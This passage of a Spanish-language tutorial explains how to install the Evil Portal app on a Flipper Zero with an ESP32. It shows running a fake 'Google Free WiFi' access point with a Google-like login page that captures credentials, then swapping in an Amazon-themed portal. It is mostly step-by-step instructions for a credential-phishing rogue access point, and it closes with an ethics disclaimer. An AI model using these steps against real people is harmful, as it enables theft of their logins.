→ Easy Way

La forma fácil de instalar la aplicación es conectando nuestro Flipper Zero al equipo. Una vez realizada la conexión ingresamos al repositorio y presionamos el siguiente enlace:

Al presionar el enlace podremos ver la siguiente web:

Al presionar en Install se desplegara un una ventana para seleccionar nuestro puerto en uso por el Flipper Zero y la aplicación procederá a instalarse:

Con esto la aplicación ya estará instalada en nuestro Flipper Zero:

→ Manual

Para instalar la aplicación de Evil Portal de manera manual vamos a la sección de releases del repositorio flipper-zero-evil-portal.

Descargaremos el archivo unleashed-evil_portal.fap.zip de la última versión. Este archivo contendrá el archivo evil_portal.fap para el firmware Unleashed:

Ya que descargamos lo necesario lo extraemos en una carpeta, ya que vamos a transferir ficheros al Flipper Zero.

El primer fichero que vamos a transferir es el fichero evil_portal.fap el cual corresponde a la aplicación. La ruta de destino de este fichero debe ser apps/GPIO/ en la SD Card.

Asi se deberia ver la aplicación:

La estructura deberia ser la siguiente:

  GPIO/
    evil_portal.fap
apps_data/
  evil_portal/
    ap.config.txt
    index.html
    logs/
      <empty>

Con esto ya habremos instalado la aplicación de Evil Portal en el Flipper Zero de manera manual. De esta forma no tendremos icono pero funcionara de todos modos. Podemos encontrar la aplicación en Apps > GPIO y seleccionamos evil_portal:

→ Evil Portal Attack

Ya hemos aprendido la configuración e instalación básica del Evil Portal. Pero ahora toca la mejor parte, como utilizarlo. Lo primero que debemos hacer es conectar nuestra placa al Flipper Zero como se explico anteriormente. A continuación Iniciamos la aplicación [ESP32] Evil Portal ubicada en apps > GPIO:

Al observar en nuestras redes observamos el SSID Google Free WiFi. Si ingresamos podremos notar como se despliega una web con un login similar al de Google:

Al ingresar credenciales estas serán capturadas con el Flipper Zero y podremos visualizarlas al momento:

→ Cambiar Portal

Ya hemos visto el potencial de un portal cautivo. Ahora aprenderemos a cambiarlo y adecuarlo para cada contexto. El repositorio descargado contiene una basta lista de portales cautivos que podemos utilizar.

Para este caso de ejemplo utilizare el portal cautivo de Amazon ubicado en la carpeta portals:

Para utilizar este portal debemos reemplazarlo por el que se encuentra ubicado en apps_data/evil_portal en la SD Card. Así que eliminamos los ficheros index.html y ap.config.txt:

A continuación depositaremos el fichero Amazon en apps_data/evil_portal y lo renombraremos a index.html:

Como se menciono anteriormente el fichero ap.config corresponde al SSID del punto de acceso. Así que el nombre que asignare será “Amazon WiFi” y lo depositare en apps_data/evil_portal:

Lo guardamos y depositamos en la ruta señalada:

Con esto ya hemos cambiado el portal cautivo. Para comprobarlo iniciaremos la aplicación de Evil Portal:

Comprobamos que nuestro punto de acceso funciona:

Y al conectarnos llegamos al portal cautivo de Amazon:

Algo importante a señalar es que puede que momento de presionar en Start Portal el portal no se levante. Esto me ha pasado un par de veces, pero solo es cosa de probar nuevamente un par de veces o desconectar la placa.

Conclusión

En este artículo, hemos explorado de manera práctica la configuración de una placa ESP32 para llevar a cabo ataques como Deauth, Beacon Spam y Evil Portal. Estos métodos, aunque poderosos, subrayan la importancia de fortalecer la seguridad en redes WiFi. Recordemos que este conocimiento debe emplearse con responsabilidad y únicamente con fines educativos y éticos.

Happy Hacking 🏴‍☠️